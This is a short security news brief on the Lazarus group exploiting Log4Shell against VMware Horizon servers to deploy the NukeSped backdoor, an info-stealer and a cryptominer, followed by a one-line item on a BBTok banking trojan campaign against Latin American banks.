North Korean state-sponsored hacking operation Lazarus has been targeting VMware Horizon servers in malware attacks exploiting the Log4Shell remote code execution flaw, tracked as CVE-2021-44228, reports BleepingComputer.
Vulnerable VMware Horizon servers have been attacked since last month by Lazarus, which has been abusing Log4Shell via the servers' Apache Tomcat service to facilitate PowerShell command execution and eventual NukeSped backdoor installation, a report from AhnLab's ASEC revealed.
Researchers found that the C++-based NukeSped backdoor features screenshot capturing, file accessing, and key press recording capabilities, and has been leveraged by Lazarus for deploying a console-based information-stealer malware.
The info-stealer has been discovered to have been able to exfiltrate browser-based search histories and account credentials, names of recently used MS Office and Hancom 2010 files, and email account data from MS Office Outlook, Outlook Express, and Windows Live Mail.
The report also showed that Log4Shell was also used by Lazarus to distribute the Jin Miner cryptominer instead.
More than 40 banks in Mexico and Brazil have been subjected to a new malware campaign involving a new variant of the BBTok banking trojan meant to exfiltrate data for hijacking online bank accounts, according to The Hacker News.